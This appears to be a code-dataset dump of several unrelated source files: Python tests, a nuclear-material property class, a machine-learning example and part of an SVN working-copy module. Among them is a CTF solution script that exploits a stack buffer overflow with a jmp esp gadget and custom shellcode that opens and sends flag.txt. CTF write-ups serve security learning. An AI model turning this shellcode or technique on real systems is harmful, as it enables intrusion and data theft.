RKrahl/pytest-dependency
|
32f87a10b86d21c7ec201153570e41144ca443d0
|
cab2f65ced816939a9041b9e67169073ef0ee412
|
refs/heads/develop
| 2023-04-27T13:06:40.853328
| 2022-02-17T17:06:21
| 2022-02-17T17:06:21
| 56,441,594
| 131
| 33
|
Apache-2.0
| 2022-03-25T10:00:08
| 2016-04-17T14:46:54
|
Python
|
UTF-8
|
Python
| false
| false
| 1,746
|
py
|
test_03_multiple_dependency.py
|
"""A complicated scenario with tests having multiple dependencies.
"""
import pytest
def test_multiple(ctestdir):
ctestdir.makepyfile("""
import pytest
@pytest.mark.dependency(name="a")
def test_a():
pytest.skip("explicit skip")
@pytest.mark.dependency(name="b")
def test_b():
assert False
@pytest.mark.dependency(name="c")
def test_c():
pass
@pytest.mark.dependency(name="d")
def test_d():
pass
@pytest.mark.dependency(name="e")
def test_e():
pass
@pytest.mark.dependency(name="f", depends=["a", "c"])
def test_f():
pass
@pytest.mark.dependency(name="g", depends=["b", "d"])
def test_g():
pass
@pytest.mark.dependency(name="h", depends=["c", "e"])
def test_h():
pass
@pytest.mark.dependency(name="i", depends=["f", "h"])
def test_i():
pass
@pytest.mark.dependency(name="j", depends=["d", "h"])
def test_j():
pass
@pytest.mark.dependency(name="k", depends=["g", "i", "j"])
def test_k():
pass
""")
result = ctestdir.runpytest("--verbose")
result.assert_outcomes(passed=5, skipped=5, failed=1)
result.stdout.re_match_lines(r"""
.*::test_a SKIPPED(?:\s+\(.*\))?
.*::test_b FAILED
.*::test_c PASSED
.*::test_d PASSED
.*::test_e PASSED
.*::test_f SKIPPED(?:\s+\(.*\))?
.*::test_g SKIPPED(?:\s+\(.*\))?
.*::test_h PASSED
.*::test_i SKIPPED(?:\s+\(.*\))?
.*::test_j PASSED
.*::test_k SKIPPED(?:\s+\(.*\))?
""")
|
4a87d021a82c0a7b7fb83200ee07e61449d17f80
|
df4361db61d10a10c46ed5f18973d89e4efda82c
|
/armi/materials/ht9.py
|
b2e63580e627b61b72db828e5dd9234e1743c61c
|
[
"Apache-2.0",
"GPL-1.0-or-later",
"BSD-3-Clause",
"LicenseRef-scancode-free-unknown"
] |
permissive
|
terrapower/armi
|
5524741c5e80781e136ea3422aed0db8398f76ae
|
360791847227df3f3a337a996ef561e00f846a09
|
refs/heads/main
| 2023-09-04T05:16:29.080518
| 2023-09-01T16:10:29
| 2023-09-01T16:10:29
| 218,863,590
| 204
| 75
|
Apache-2.0
| 2023-09-14T20:42:24
| 2019-10-31T21:18:34
|
Python
|
UTF-8
|
Python
| false
| false
| 2,945
|
py
|
ht9.py
|
# Copyright 2019 TerraPower, LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Simple/academic/incomplete HT9 ferritic-martensitic stainless steel material.
This is a famous SFR cladding/duct material because it doesn't void swell that much.
"""
from armi import materials
from armi.utils import units
class HT9(materials.Material):
"""
Simplified HT9 stainless steel.
    .. warning:: This is academic-quality material.
When more detail is desired, a custom material should be implemented via a
user-provided plugin.
.. [MFH] Metallic Fuels Handbook
Hofman, G. L., Billone, M. C., Koenig, J. F., Kramer, J. M., Lambert, J. D. B., Leibowitz, L.,
Orechwa, Y., Pedersen, D. R., Porter, D. L., Tsai, H., and Wright, A. E. Metallic Fuels Handbook.
United States: N. p., 2019. Web. doi:10.2172/1506477.
https://www.osti.gov/biblio/1506477-metallic-fuels-handbook
"""
propertyValidTemperature = {"linear expansion": ((293, 1050), "K")}
def setDefaultMassFracs(self):
"""
HT9 mass fractions.
From E.2-1 of [MFH]_.
https://www.osti.gov/biblio/1506477-metallic-fuels-handbook
"""
self.setMassFrac("C", 0.002)
self.setMassFrac("MN", 0.005)
self.setMassFrac("SI", 0.0025)
self.setMassFrac("NI", 0.0055)
self.setMassFrac("CR", 0.1175)
self.setMassFrac("MO", 0.01)
self.setMassFrac("W", 0.0055)
self.setMassFrac("V", 0.0030)
self.setMassFrac("FE", 1.0 - sum(self.massFrac.values()))
self.refDens = 7.778
def linearExpansionPercent(self, Tk=None, Tc=None):
"""
Gets the linear expansion from E.2.2.2 in [MFH]_ for HT9.
The ref gives dL/L0 in percent and is valid from 293 - 1050 K.
"""
tk = units.getTk(Tc, Tk)
self.checkPropertyTempRange("linear expansion", tk)
return -0.16256 + 1.62307e-4 * tk + 1.42357e-6 * tk**2 - 5.50344e-10 * tk**3
def thermalConductivity(self, Tk=None, Tc=None):
"""
        Thermal conductivity in W/(m-K).
From [MFH]_, E.2.2.3, eq 5.
.. tip:: This can probably be sped up with a polynomial evaluator.
"""
Tk = units.getTk(Tc, Tk)
return (
29.65
- 6.668e-2 * Tk
+ 2.184e-4 * Tk**2
- 2.527e-7 * Tk**3
+ 9.621e-11 * Tk**4
)
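# A hedged sketch of the speed-up suggested in the tip above: evaluate the same
# quartic in Horner form via numpy.polyval (coefficients ordered highest power
# first). Illustration only; not part of the ARMI API.
import numpy as np

_HT9_K_COEFFS = [9.621e-11, -2.527e-7, 2.184e-4, -6.668e-2, 29.65]

def _thermalConductivityHT9Polyval(tk):
    """Same polynomial as HT9.thermalConductivity, in W/(m-K)."""
    return np.polyval(_HT9_K_COEFFS, tk)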
|
f2c13db67e193e8b314ebc3106ae0671cfd83147
|
24db6985a016c3e4767c95ca51190e659d0847cd
|
/hacktivityctf2021/yabo/exploit.py
|
785d759e9cc4f4df9606fe7500f1d70a7a9a2ab0
|
[
"MIT"
] |
permissive
|
datajerk/ctf-write-ups
|
463f53db224410a51df481b9e41b7777a09f3e2c
|
c33815911de3f4a66cbafbf5f12d7b57239250d9
|
refs/heads/master
| 2022-09-30T02:29:44.097435
| 2022-09-05T02:16:19
| 2022-09-05T02:16:19
| 204,361,251
| 136
| 36
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,522
|
py
|
exploit.py
|
#!/usr/bin/env python3
from pwn import *
from binascii import hexlify
binary = context.binary = ELF('./yabo')
if args.REMOTE:
p = remote('challenge.ctf.games', 32332)
else:
p = remote('127.0.0.1', 9999)
arg0 = b'./flag.txt'
shellcode = asm(f'''
/* open flag.txt */
xor eax, eax # eax = 0
xor ecx, ecx # ecx = 0
xor edx, edx # edx = 0
    mov ebx, {'-0x' + hexlify(arg0[8:][::-1]).decode()} # chunk is NUL-padded: load the negated value, NEG it back, then push to stack
neg ebx
push ebx
push {'0x' + hexlify(arg0[4:8][::-1]).decode()} # rest of filename
push {'0x' + hexlify(arg0[0:4][::-1]).decode()}
mov ebx, esp # ebx points to ./flag.txt
mov al, {constants.SYS_open} # open file, eax will have FD for open file
int 0x80
/* use sendfile to, well, send the file */
mov ecx, eax # mv open FD to ecx
dec eax # fd from open
mov ebx, eax # now fd of accept
push 50 # length of flag?
pop esi
    xor edx, edx # zero edx; may not be required since it was zeroed above and is not used
xor eax, eax # eax = 0
mov al, 187 # sendfile syscall (was not in pwn tools table)
int 0x80
''')
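# A small sanity check of the NEG trick above (illustration only): the final
# chunk of arg0 is NUL-padded to a dword, so using the raw constant would put
# NUL bytes in the instruction stream; loading its two's-complement negation
# and NEG-ing it back reconstructs the same dword with no NULs in the
# immediate.
_chunk = arg0[8:].ljust(4, b'\x00')
_val = int.from_bytes(_chunk, 'little')
assert (-((-_val) & 0xFFFFFFFF)) & 0xFFFFFFFF == _val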
log.info('len(shellcode): ' + str(len(shellcode)))
jmp_esp = next(binary.search(asm('jmp esp')))
payload = b''
payload += 0x414 * b'A'
payload += p32(jmp_esp)
payload += shellcode
if payload.find(b'\0') != -1:
log.critical('NULL in payload, exiting!')
print(disasm(shellcode))
sys.exit(1)
p.sendlineafter(b'say?: ',payload)
p.stream()
|
838f289137edba4673204a7b640bcb4f896e01db
|
7efe08063fd383640455cc709ef04c889b8ebc42
|
/test/functional/feature_notifications.py
|
9fdfa7d83c9943ce0bdbc424cd8000effe98ce2f
|
[
"MIT"
] |
permissive
|
litecoin-project/litecoin
|
0d55434c63e41409f3c69b43199a9cb6bd256a83
|
5ac781487cc9589131437b23c69829f04002b97e
|
refs/heads/master
| 2023-09-05T21:38:55.634991
| 2023-04-24T04:08:34
| 2023-05-12T06:47:49
| 4,646,198
| 4,040
| 4,600
|
MIT
| 2023-07-29T19:58:50
| 2012-06-13T04:18:26
|
C++
|
UTF-8
|
Python
| false
| false
| 7,574
|
py
|
feature_notifications.py
|
#!/usr/bin/env python3
# Copyright (c) 2014-2019 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test the -alertnotify, -blocknotify and -walletnotify options."""
import os
from test_framework.address import ADDRESS_BCRT1_UNSPENDABLE, keyhash_to_p2pkh
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import (
assert_equal,
hex_str_to_bytes,
)
# Linux allows all characters other than \x00
# Windows disallows control characters (0-31) and /\?%*:|"<>
FILE_CHAR_START = 32 if os.name == 'nt' else 1
FILE_CHAR_END = 128
FILE_CHARS_DISALLOWED = '/\\?%*:|"<>' if os.name == 'nt' else '/'
def notify_outputname(walletname, txid):
return txid if os.name == 'nt' else '{}_{}'.format(walletname, txid)
class NotificationsTest(BitcoinTestFramework):
def set_test_params(self):
self.num_nodes = 2
self.setup_clean_chain = True
def setup_network(self):
self.wallet = ''.join(chr(i) for i in range(FILE_CHAR_START, FILE_CHAR_END) if chr(i) not in FILE_CHARS_DISALLOWED)
self.alertnotify_dir = os.path.join(self.options.tmpdir, "alertnotify")
self.blocknotify_dir = os.path.join(self.options.tmpdir, "blocknotify")
self.walletnotify_dir = os.path.join(self.options.tmpdir, "walletnotify")
os.mkdir(self.alertnotify_dir)
os.mkdir(self.blocknotify_dir)
os.mkdir(self.walletnotify_dir)
# -alertnotify and -blocknotify on node0, walletnotify on node1
self.extra_args = [[
"-alertnotify=echo > {}".format(os.path.join(self.alertnotify_dir, '%s')),
"-blocknotify=echo > {}".format(os.path.join(self.blocknotify_dir, '%s')),
"-mempoolreplacement=1",
], [
"-rescan",
"-walletnotify=echo > {}".format(os.path.join(self.walletnotify_dir, notify_outputname('%w', '%s'))),
"-mempoolreplacement=1",
]]
self.wallet_names = [self.default_wallet_name, self.wallet]
super().setup_network()
def run_test(self):
self.log.info("test -blocknotify")
block_count = 10
blocks = self.nodes[1].generatetoaddress(block_count, self.nodes[1].getnewaddress() if self.is_wallet_compiled() else ADDRESS_BCRT1_UNSPENDABLE)
# wait at most 10 seconds for expected number of files before reading the content
self.wait_until(lambda: len(os.listdir(self.blocknotify_dir)) == block_count, timeout=10)
# directory content should equal the generated blocks hashes
assert_equal(sorted(blocks), sorted(os.listdir(self.blocknotify_dir)))
if self.is_wallet_compiled():
self.log.info("test -walletnotify")
# wait at most 10 seconds for expected number of files before reading the content
self.wait_until(lambda: len(os.listdir(self.walletnotify_dir)) == block_count, timeout=10)
# directory content should equal the generated transaction hashes
txids_rpc = list(map(lambda t: notify_outputname(self.wallet, t['txid']), self.nodes[1].listtransactions("*", block_count)))
assert_equal(sorted(txids_rpc), sorted(os.listdir(self.walletnotify_dir)))
self.stop_node(1)
for tx_file in os.listdir(self.walletnotify_dir):
os.remove(os.path.join(self.walletnotify_dir, tx_file))
self.log.info("test -walletnotify after rescan")
# restart node to rescan to force wallet notifications
self.start_node(1)
self.connect_nodes(0, 1)
self.wait_until(lambda: len(os.listdir(self.walletnotify_dir)) == block_count, timeout=10)
# directory content should equal the generated transaction hashes
txids_rpc = list(map(lambda t: notify_outputname(self.wallet, t['txid']), self.nodes[1].listtransactions("*", block_count)))
assert_equal(sorted(txids_rpc), sorted(os.listdir(self.walletnotify_dir)))
for tx_file in os.listdir(self.walletnotify_dir):
os.remove(os.path.join(self.walletnotify_dir, tx_file))
# Conflicting transactions tests. Give node 0 same wallet seed as
# node 1, generate spends from node 0, and check notifications
# triggered by node 1
self.log.info("test -walletnotify with conflicting transactions")
self.nodes[0].sethdseed(seed=self.nodes[1].dumpprivkey(keyhash_to_p2pkh(hex_str_to_bytes(self.nodes[1].getwalletinfo()['hdseedid'])[::-1])))
self.nodes[0].rescanblockchain()
self.nodes[0].generatetoaddress(100, ADDRESS_BCRT1_UNSPENDABLE)
self.sync_blocks()
# Generate transaction on node 0, sync mempools, and check for
# notification on node 1.
tx1 = self.nodes[0].sendtoaddress(address=ADDRESS_BCRT1_UNSPENDABLE, amount=1, replaceable=True)
assert_equal(tx1 in self.nodes[0].getrawmempool(), True)
self.sync_mempools()
self.expect_wallet_notify([tx1])
# Generate bump transaction, sync mempools, and check for bump1
# notification. In the future, per
# https://github.com/bitcoin/bitcoin/pull/9371, it might be better
# to have notifications for both tx1 and bump1.
bump1 = self.nodes[0].bumpfee(tx1)["txid"]
assert_equal(bump1 in self.nodes[0].getrawmempool(), True)
self.sync_mempools()
self.expect_wallet_notify([bump1])
# Add bump1 transaction to new block, checking for a notification
# and the correct number of confirmations.
self.nodes[0].generatetoaddress(1, ADDRESS_BCRT1_UNSPENDABLE)
self.sync_blocks()
self.expect_wallet_notify([bump1])
assert_equal(self.nodes[1].gettransaction(bump1)["confirmations"], 1)
# Generate a second transaction to be bumped.
tx2 = self.nodes[0].sendtoaddress(address=ADDRESS_BCRT1_UNSPENDABLE, amount=1, replaceable=True)
assert_equal(tx2 in self.nodes[0].getrawmempool(), True)
self.sync_mempools()
self.expect_wallet_notify([tx2])
# Bump tx2 as bump2 and generate a block on node 0 while
# disconnected, then reconnect and check for notifications on node 1
# about newly confirmed bump2 and newly conflicted tx2.
self.disconnect_nodes(0, 1)
bump2 = self.nodes[0].bumpfee(tx2)["txid"]
self.nodes[0].generatetoaddress(1, ADDRESS_BCRT1_UNSPENDABLE)
assert_equal(self.nodes[0].gettransaction(bump2)["confirmations"], 1)
assert_equal(tx2 in self.nodes[1].getrawmempool(), True)
self.connect_nodes(0, 1)
self.sync_blocks()
self.expect_wallet_notify([bump2, tx2])
assert_equal(self.nodes[1].gettransaction(bump2)["confirmations"], 1)
# TODO: add test for `-alertnotify` large fork notifications
def expect_wallet_notify(self, tx_ids):
self.wait_until(lambda: len(os.listdir(self.walletnotify_dir)) >= len(tx_ids), timeout=10)
assert_equal(sorted(notify_outputname(self.wallet, tx_id) for tx_id in tx_ids), sorted(os.listdir(self.walletnotify_dir)))
for tx_file in os.listdir(self.walletnotify_dir):
os.remove(os.path.join(self.walletnotify_dir, tx_file))
if __name__ == '__main__':
NotificationsTest().main()
|
995094a6e303aa40ebd5846a68aa65540f08632d
|
1f7afd1360d14d7ebd6e48dd4328f384c8cdf486
|
/examples/evaluation/plot_classification_report.py
|
7d21371b4f51a47f83e622c651566d5073aeff14
|
[
"MIT"
] |
permissive
|
scikit-learn-contrib/imbalanced-learn
|
add5eef6af31ff229e8a99cc8767a76da83fc647
|
27bb6c7b0fab2dd0941ed56d2895478776c74f95
|
refs/heads/master
| 2023-08-31T21:40:03.484581
| 2023-08-09T08:39:17
| 2023-08-09T08:39:17
| 23,011,147
| 6,423
| 1,286
|
MIT
| 2023-09-07T14:08:47
| 2014-08-16T05:08:26
|
Python
|
UTF-8
|
Python
| false
| false
| 1,584
|
py
|
plot_classification_report.py
|
"""
=============================================
Evaluate classification by compiling a report
=============================================
Specific metrics have been developed to evaluate classifiers that have been
trained using imbalanced data. :mod:`imblearn` provides a classification report
similar to :mod:`sklearn`'s, with additional metrics specific to the imbalanced
learning problem.
"""
# Authors: Guillaume Lemaitre <g.lemaitre58@gmail.com>
# License: MIT
from sklearn import datasets
from sklearn.linear_model import LogisticRegression
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import StandardScaler
from imblearn import over_sampling as os
from imblearn import pipeline as pl
from imblearn.metrics import classification_report_imbalanced
print(__doc__)
RANDOM_STATE = 42
# Generate a dataset
X, y = datasets.make_classification(
n_classes=2,
class_sep=2,
weights=[0.1, 0.9],
n_informative=10,
n_redundant=1,
flip_y=0,
n_features=20,
n_clusters_per_class=4,
n_samples=5000,
random_state=RANDOM_STATE,
)
pipeline = pl.make_pipeline(
StandardScaler(),
os.SMOTE(random_state=RANDOM_STATE),
LogisticRegression(max_iter=10_000),
)
# Split the data
X_train, X_test, y_train, y_test = train_test_split(X, y, random_state=RANDOM_STATE)
# Train the classifier with balancing
pipeline.fit(X_train, y_train)
# Test the classifier and get the prediction
y_pred_bal = pipeline.predict(X_test)
# Show the classification report
print(classification_report_imbalanced(y_test, y_pred_bal))
|
fd03f0065dd6451a9c1cf08a038a781a7afffc28
|
96dcea595e7c16cec07b3f649afd65f3660a0bad
|
/tests/components/lastfm/test_init.py
|
2f126af11a3307882890151a7f514a1c00d1cf94
|
[
"Apache-2.0"
] |
permissive
|
home-assistant/core
|
3455eac2e9d925c92d30178643b1aaccf3a6484f
|
80caeafcb5b6e2f9da192d0ea6dd1a5b8244b743
|
refs/heads/dev
| 2023-08-31T15:41:06.299469
| 2023-08-31T14:50:53
| 2023-08-31T14:50:53
| 12,888,993
| 35,501
| 20,617
|
Apache-2.0
| 2023-09-14T21:50:15
| 2013-09-17T07:29:48
|
Python
|
UTF-8
|
Python
| false
| false
| 864
|
py
|
test_init.py
|
"""Test LastFM component setup process."""
from __future__ import annotations
from homeassistant.components.lastfm.const import DOMAIN
from homeassistant.core import HomeAssistant
from . import MockUser
from .conftest import ComponentSetup
from tests.common import MockConfigEntry
async def test_load_unload_entry(
hass: HomeAssistant,
setup_integration: ComponentSetup,
config_entry: MockConfigEntry,
default_user: MockUser,
) -> None:
"""Test load and unload entry."""
await setup_integration(config_entry, default_user)
entry = hass.config_entries.async_entries(DOMAIN)[0]
state = hass.states.get("sensor.lastfm_testaccount1")
assert state
await hass.config_entries.async_remove(entry.entry_id)
await hass.async_block_till_done()
state = hass.states.get("sensor.lastfm_testaccount1")
assert not state
|
646cb5c5474efd6ba1107510e78ca7888123b406
|
010279e2ba272d09e9d2c4e903722e5faba2cf7a
|
/contrib/python/py/py/_path/svnwc.py
|
b5b9d8d544a25253dab87a4f9d1bc3752f38ba06
|
[
"Apache-2.0",
"MIT"
] |
permissive
|
catboost/catboost
|
854c1a1f439a96f1ae6b48e16644be20aa04dba2
|
f5042e35b945aded77b23470ead62d7eacefde92
|
refs/heads/master
| 2023-09-01T12:14:14.174108
| 2023-09-01T10:01:01
| 2023-09-01T10:22:12
| 97,556,265
| 8,012
| 1,425
|
Apache-2.0
| 2023-09-11T03:32:32
| 2017-07-18T05:29:04
|
Python
|
UTF-8
|
Python
| false
| false
| 43,825
|
py
|
svnwc.py
|
"""
svn-Command based Implementation of a Subversion WorkingCopy Path.
SvnWCCommandPath is the main class.
"""
import os, sys, time, re, calendar, string
import py
import subprocess
from py._path import common
#-----------------------------------------------------------
# Caching latest repository revision and repo-paths
# (getting them is slow with the current implementations)
#
# XXX make mt-safe
#-----------------------------------------------------------
class cache:
proplist = {}
info = {}
entries = {}
prop = {}
class RepoEntry:
def __init__(self, url, rev, timestamp):
self.url = url
self.rev = rev
self.timestamp = timestamp
def __str__(self):
return "repo: %s;%s %s" %(self.url, self.rev, self.timestamp)
class RepoCache:
""" The Repocache manages discovered repository paths
and their revisions. If inside a timeout the cache
will even return the revision of the root.
"""
timeout = 20 # seconds after which we forget that we know the last revision
def __init__(self):
self.repos = []
def clear(self):
self.repos = []
def put(self, url, rev, timestamp=None):
if rev is None:
return
if timestamp is None:
timestamp = time.time()
for entry in self.repos:
if url == entry.url:
entry.timestamp = timestamp
entry.rev = rev
#print "set repo", entry
break
else:
entry = RepoEntry(url, rev, timestamp)
self.repos.append(entry)
#print "appended repo", entry
def get(self, url):
now = time.time()
for entry in self.repos:
if url.startswith(entry.url):
if now < entry.timestamp + self.timeout:
#print "returning immediate Etrny", entry
return entry.url, entry.rev
return entry.url, -1
return url, -1
repositories = RepoCache()
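# A hedged usage sketch of the cache above (placeholder URL, not a real repo):
# within `timeout` seconds of put(), get() on any sub-path returns the cached
# revision; afterwards it returns -1 so callers re-query the server.
def _repocache_example():
    rc = RepoCache()
    rc.put("http://example.org/svn/repo", 42)
    return rc.get("http://example.org/svn/repo/trunk")  # -> ("http://example.org/svn/repo", 42)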
# svn support code
ALLOWED_CHARS = "_ -/\\=$.~+%" #add characters as necessary when tested
if sys.platform == "win32":
ALLOWED_CHARS += ":"
ALLOWED_CHARS_HOST = ALLOWED_CHARS + '@:'
def _getsvnversion(ver=[]):
try:
return ver[0]
except IndexError:
v = py.process.cmdexec("svn -q --version")
v.strip()
v = '.'.join(v.split('.')[:2])
ver.append(v)
return v
def _escape_helper(text):
text = str(text)
if sys.platform != 'win32':
text = str(text).replace('$', '\\$')
return text
def _check_for_bad_chars(text, allowed_chars=ALLOWED_CHARS):
for c in str(text):
if c.isalnum():
continue
if c in allowed_chars:
continue
return True
return False
def checkbadchars(url):
# (hpk) not quite sure about the exact purpose, guido w.?
proto, uri = url.split("://", 1)
if proto != "file":
host, uripath = uri.split('/', 1)
# only check for bad chars in the non-protocol parts
if (_check_for_bad_chars(host, ALLOWED_CHARS_HOST) \
or _check_for_bad_chars(uripath, ALLOWED_CHARS)):
raise ValueError("bad char in %r" % (url, ))
#_______________________________________________________________
class SvnPathBase(common.PathBase):
""" Base implementation for SvnPath implementations. """
sep = '/'
def _geturl(self):
return self.strpath
url = property(_geturl, None, None, "url of this svn-path.")
def __str__(self):
""" return a string representation (including rev-number) """
return self.strpath
def __hash__(self):
return hash(self.strpath)
def new(self, **kw):
""" create a modified version of this path. A 'rev' argument
indicates a new revision.
the following keyword arguments modify various path parts::
http://host.com/repo/path/file.ext
|-----------------------| dirname
|------| basename
|--| purebasename
|--| ext
"""
obj = object.__new__(self.__class__)
obj.rev = kw.get('rev', self.rev)
obj.auth = kw.get('auth', self.auth)
dirname, basename, purebasename, ext = self._getbyspec(
"dirname,basename,purebasename,ext")
if 'basename' in kw:
if 'purebasename' in kw or 'ext' in kw:
raise ValueError("invalid specification %r" % kw)
else:
pb = kw.setdefault('purebasename', purebasename)
ext = kw.setdefault('ext', ext)
if ext and not ext.startswith('.'):
ext = '.' + ext
kw['basename'] = pb + ext
kw.setdefault('dirname', dirname)
kw.setdefault('sep', self.sep)
if kw['basename']:
obj.strpath = "%(dirname)s%(sep)s%(basename)s" % kw
else:
obj.strpath = "%(dirname)s" % kw
return obj
def _getbyspec(self, spec):
""" get specified parts of the path. 'arg' is a string
with comma separated path parts. The parts are returned
in exactly the order of the specification.
you may specify the following parts:
http://host.com/repo/path/file.ext
|-----------------------| dirname
|------| basename
|--| purebasename
|--| ext
"""
res = []
parts = self.strpath.split(self.sep)
for name in spec.split(','):
name = name.strip()
if name == 'dirname':
res.append(self.sep.join(parts[:-1]))
elif name == 'basename':
res.append(parts[-1])
else:
basename = parts[-1]
i = basename.rfind('.')
if i == -1:
purebasename, ext = basename, ''
else:
purebasename, ext = basename[:i], basename[i:]
if name == 'purebasename':
res.append(purebasename)
elif name == 'ext':
res.append(ext)
else:
raise NameError("Don't know part %r" % name)
return res
def __eq__(self, other):
""" return true if path and rev attributes each match """
        return (str(self) == str(other) and
                self.rev == other.rev)
def __ne__(self, other):
return not self == other
def join(self, *args):
""" return a new Path (with the same revision) which is composed
of the self Path followed by 'args' path components.
"""
if not args:
return self
args = tuple([arg.strip(self.sep) for arg in args])
parts = (self.strpath, ) + args
newpath = self.__class__(self.sep.join(parts), self.rev, self.auth)
return newpath
def propget(self, name):
""" return the content of the given property. """
value = self._propget(name)
return value
def proplist(self):
""" list all property names. """
content = self._proplist()
return content
def size(self):
""" Return the size of the file content of the Path. """
return self.info().size
def mtime(self):
""" Return the last modification time of the file. """
return self.info().mtime
# shared help methods
def _escape(self, cmd):
return _escape_helper(cmd)
#def _childmaxrev(self):
# """ return maximum revision number of childs (or self.rev if no childs) """
# rev = self.rev
# for name, info in self._listdir_nameinfo():
# rev = max(rev, info.created_rev)
# return rev
#def _getlatestrevision(self):
# """ return latest repo-revision for this path. """
# url = self.strpath
# path = self.__class__(url, None)
#
# # we need a long walk to find the root-repo and revision
# while 1:
# try:
# rev = max(rev, path._childmaxrev())
# previous = path
# path = path.dirpath()
# except (IOError, process.cmdexec.Error):
# break
# if rev is None:
# raise IOError, "could not determine newest repo revision for %s" % self
# return rev
class Checkers(common.Checkers):
def dir(self):
try:
return self.path.info().kind == 'dir'
except py.error.Error:
return self._listdirworks()
def _listdirworks(self):
try:
self.path.listdir()
except py.error.ENOENT:
return False
else:
return True
def file(self):
try:
return self.path.info().kind == 'file'
except py.error.ENOENT:
return False
def exists(self):
try:
return self.path.info()
except py.error.ENOENT:
return self._listdirworks()
def parse_apr_time(timestr):
i = timestr.rfind('.')
if i == -1:
raise ValueError("could not parse %s" % timestr)
timestr = timestr[:i]
parsedtime = time.strptime(timestr, "%Y-%m-%dT%H:%M:%S")
return time.mktime(parsedtime)
class PropListDict(dict):
""" a Dictionary which fetches values (InfoSvnCommand instances) lazily"""
def __init__(self, path, keynames):
dict.__init__(self, [(x, None) for x in keynames])
self.path = path
def __getitem__(self, key):
value = dict.__getitem__(self, key)
if value is None:
value = self.path.propget(key)
dict.__setitem__(self, key, value)
return value
def fixlocale():
if sys.platform != 'win32':
return 'LC_ALL=C '
return ''
# some nasty chunk of code to solve path and url conversion and quoting issues
ILLEGAL_CHARS = '* | \\ / : < > ? \t \n \x0b \x0c \r'.split(' ')
if os.sep in ILLEGAL_CHARS:
ILLEGAL_CHARS.remove(os.sep)
ISWINDOWS = sys.platform == 'win32'
_reg_allow_disk = re.compile(r'^([a-z]\:\\)?[^:]+$', re.I)
def _check_path(path):
illegal = ILLEGAL_CHARS[:]
sp = path.strpath
if ISWINDOWS:
illegal.remove(':')
if not _reg_allow_disk.match(sp):
raise ValueError('path may not contain a colon (:)')
for char in sp:
if char not in string.printable or char in illegal:
raise ValueError('illegal character %r in path' % (char,))
def path_to_fspath(path, addat=True):
_check_path(path)
sp = path.strpath
if addat and path.rev != -1:
sp = '%s@%s' % (sp, path.rev)
elif addat:
sp = '%s@HEAD' % (sp,)
return sp
def url_from_path(path):
fspath = path_to_fspath(path, False)
from urllib import quote
if ISWINDOWS:
match = _reg_allow_disk.match(fspath)
fspath = fspath.replace('\\', '/')
if match.group(1):
fspath = '/%s%s' % (match.group(1).replace('\\', '/'),
quote(fspath[len(match.group(1)):]))
else:
fspath = quote(fspath)
else:
fspath = quote(fspath)
if path.rev != -1:
fspath = '%s@%s' % (fspath, path.rev)
else:
fspath = '%s@HEAD' % (fspath,)
return 'file://%s' % (fspath,)
class SvnAuth(object):
""" container for auth information for Subversion """
def __init__(self, username, password, cache_auth=True, interactive=True):
self.username = username
self.password = password
self.cache_auth = cache_auth
self.interactive = interactive
def makecmdoptions(self):
uname = self.username.replace('"', '\\"')
passwd = self.password.replace('"', '\\"')
ret = []
if uname:
ret.append('--username="%s"' % (uname,))
if passwd:
ret.append('--password="%s"' % (passwd,))
if not self.cache_auth:
ret.append('--no-auth-cache')
if not self.interactive:
ret.append('--non-interactive')
return ' '.join(ret)
def __str__(self):
return "<SvnAuth username=%s ...>" %(self.username,)
rex_blame = re.compile(r'\s*(\d+)\s+(\S+) (.*)')
class SvnWCCommandPath(common.PathBase):
""" path implementation offering access/modification to svn working copies.
It has methods similar to the functions in os.path and similar to the
commands of the svn client.
"""
sep = os.sep
def __new__(cls, wcpath=None, auth=None):
self = object.__new__(cls)
if isinstance(wcpath, cls):
if wcpath.__class__ == cls:
return wcpath
wcpath = wcpath.localpath
if _check_for_bad_chars(str(wcpath),
ALLOWED_CHARS):
raise ValueError("bad char in wcpath %s" % (wcpath, ))
self.localpath = py.path.local(wcpath)
self.auth = auth
return self
strpath = property(lambda x: str(x.localpath), None, None, "string path")
rev = property(lambda x: x.info(usecache=0).rev, None, None, "revision")
def __eq__(self, other):
return self.localpath == getattr(other, 'localpath', None)
def _geturl(self):
if getattr(self, '_url', None) is None:
info = self.info()
self._url = info.url #SvnPath(info.url, info.rev)
assert isinstance(self._url, py.builtin._basestring)
return self._url
url = property(_geturl, None, None, "url of this WC item")
def _escape(self, cmd):
return _escape_helper(cmd)
def dump(self, obj):
""" pickle object into path location"""
return self.localpath.dump(obj)
def svnurl(self):
""" return current SvnPath for this WC-item. """
info = self.info()
return py.path.svnurl(info.url)
def __repr__(self):
return "svnwc(%r)" % (self.strpath) # , self._url)
def __str__(self):
return str(self.localpath)
def _makeauthoptions(self):
if self.auth is None:
return ''
return self.auth.makecmdoptions()
def _authsvn(self, cmd, args=None):
args = args and list(args) or []
args.append(self._makeauthoptions())
return self._svn(cmd, *args)
def _svn(self, cmd, *args):
l = ['svn %s' % cmd]
args = [self._escape(item) for item in args]
l.extend(args)
l.append('"%s"' % self._escape(self.strpath))
# try fixing the locale because we can't otherwise parse
string = fixlocale() + " ".join(l)
try:
try:
key = 'LC_MESSAGES'
hold = os.environ.get(key)
os.environ[key] = 'C'
out = py.process.cmdexec(string)
finally:
if hold:
os.environ[key] = hold
else:
del os.environ[key]
except py.process.cmdexec.Error:
e = sys.exc_info()[1]
strerr = e.err.lower()
if strerr.find('not found') != -1:
raise py.error.ENOENT(self)
elif strerr.find("E200009:") != -1:
raise py.error.ENOENT(self)
if (strerr.find('file exists') != -1 or
strerr.find('file already exists') != -1 or
strerr.find('w150002:') != -1 or
strerr.find("can't create directory") != -1):
raise py.error.EEXIST(strerr) #self)
raise
return out
def switch(self, url):
""" switch to given URL. """
self._authsvn('switch', [url])
def checkout(self, url=None, rev=None):
""" checkout from url to local wcpath. """
args = []
if url is None:
url = self.url
if rev is None or rev == -1:
